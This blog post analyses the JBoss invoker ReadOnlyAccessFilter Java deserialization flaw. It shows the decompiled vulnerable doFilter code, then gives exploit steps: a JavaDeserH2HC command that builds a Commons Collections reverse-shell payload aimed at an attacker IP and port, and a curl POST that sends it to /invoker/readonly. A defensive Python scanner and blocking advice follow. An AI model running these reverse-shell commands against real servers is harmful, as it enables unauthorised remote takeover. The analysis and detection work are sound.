
JBoss Deserialization Analysis

2018-08-21  by 身自在

This deserialization vulnerability lives in server/all/deploy/httpha-invoker.sar/invoker.war/WEB-INF/classes/org/jboss/invocation/http/servlet/ReadOnlyAccessFilter.class.
First decompile it with jad; this produces a .jad file of the same name, which is really just the .java source:

    jad ReadOnlyAccessFilter.class

In its doFilter method the HTTP request body is fed straight into an ObjectInputStream and readObject() is called on it with no check of what is being deserialized, a textbook deserialization vulnerability.

    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
        throws IOException, ServletException
    {
        HttpServletRequest httpRequest = (HttpServletRequest)request;
        java.security.Principal user = httpRequest.getUserPrincipal();
        // Unauthenticated requests take this branch when a read-only context is configured
        if(user == null && readOnlyContext != null)
        {
            // The raw request body is wrapped directly in an ObjectInputStream ...
            javax.servlet.ServletInputStream sis = request.getInputStream();
            ObjectInputStream ois = new ObjectInputStream(sis);
            MarshalledInvocation mi = null;
            try
            {
                // ... and deserialized before any type check; the cast happens only after
                // readObject() has already run, so any class on the classpath can be instantiated
                mi = (MarshalledInvocation)ois.readObject();
            }
            catch(ClassNotFoundException e)
            {
                throw new ServletException("Failed to read MarshalledInvocation", e);
            }
            request.setAttribute("MarshalledInvocation", mi);
            mi.setMethodMap(namingMethodMap);
            Method m = mi.getMethod();
            // Access validation only happens here, after deserialization has completed
            if(m != null)
                validateAccess(m, mi);
        }
        chain.doFilter(request, response);
    }

Then test the vulnerability with JavaDeserH2HC:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.21.1:1234

This generates ReverseShellCommonsCollectionsHashMap.ser in the current directory; POST that data to the server:
curl http://192.168.21.128:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
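Because the filter above accepts whatever object the body contains, a defender can at least triage what is being POSTed to /invoker/readonly. The following Python scanner is an added example, not code from the post or from JBoss: it recognises the Java serialization header, reads the top-level class name by following the stream grammar, and flags any body whose first object is not the MarshalledInvocation the filter expects. The sample byte strings are constructed stream heads, not real captures, and the full class-name walk is a heuristic rather than a complete parser.

```python
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"          # ObjectOutputStream header: STREAM_MAGIC + STREAM_VERSION
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72        # type codes from the Java serialization grammar
EXPECTED_TOP_CLASS = "org.jboss.invocation.MarshalledInvocation"  # the only type doFilter expects

def top_level_class(body: bytes):
    """Class name of the first object in the stream, or None.
    Follows the grammar for the common case: magic, TC_OBJECT, TC_CLASSDESC, u2 length, UTF name."""
    if not body.startswith(STREAM_MAGIC) or len(body) < 8:
        return None
    if body[4] != TC_OBJECT or body[5] != TC_CLASSDESC:
        return None
    (n,) = struct.unpack(">H", body[6:8])
    name = body[8:8 + n]
    return name.decode("utf-8", "replace") if len(name) == n else None

def class_names(body: bytes):
    """Best-effort list of every class descriptor name (TC_CLASSDESC, u2 length, name) in the stream.
    Heuristic: a 0x72 byte inside field data can yield a false hit, so treat the list as hints."""
    found, i = [], body.find(bytes([TC_CLASSDESC]), 4)
    while i != -1 and i + 3 <= len(body):
        (n,) = struct.unpack(">H", body[i + 1:i + 3])
        cand = body[i + 3:i + 3 + n]
        if len(cand) == n and re.fullmatch(rb"[A-Za-z_$][\w$.]*", cand):
            found.append(cand.decode())
        i = body.find(bytes([TC_CLASSDESC]), i + 1)
    return found

def verdict(body: bytes) -> str:
    """Triage verdict for one request body sent to /invoker/readonly."""
    if not body.startswith(STREAM_MAGIC):
        return "not-java-serialization"
    top = top_level_class(body)
    if top != EXPECTED_TOP_CLASS:
        return f"suspicious: top-level class {top!r} is not {EXPECTED_TOP_CLASS}"
    return "expected-shape"

# Constructed sample stream heads (not captures); only the leading bytes matter to this scanner.
SAMPLE_GADGET = (STREAM_MAGIC + b"\x73\x72\x00\x11java.util.HashMap"
                 + b"\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02"   # serialVersionUID, flags, field count
                 + b"\x72\x00\x2aorg.apache.commons.collections.map.LazyMap")
SAMPLE_LEGIT = STREAM_MAGIC + b"\x73\x72\x00\x29org.jboss.invocation.MarshalledInvocation"

if __name__ == "__main__":
    for label, body in (("gadget", SAMPLE_GADGET), ("legit", SAMPLE_LEGIT), ("text", b"GET / HTTP/1.1")):
        print(f"{label}: {verdict(body)}  classes={class_names(body)}")
```

Since an unauthenticated client has no legitimate reason to post a serialized object to this endpoint at all, the stricter operational rule is to block or alert on the STREAM_MAGIC header itself and keep the class check as supporting evidence.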
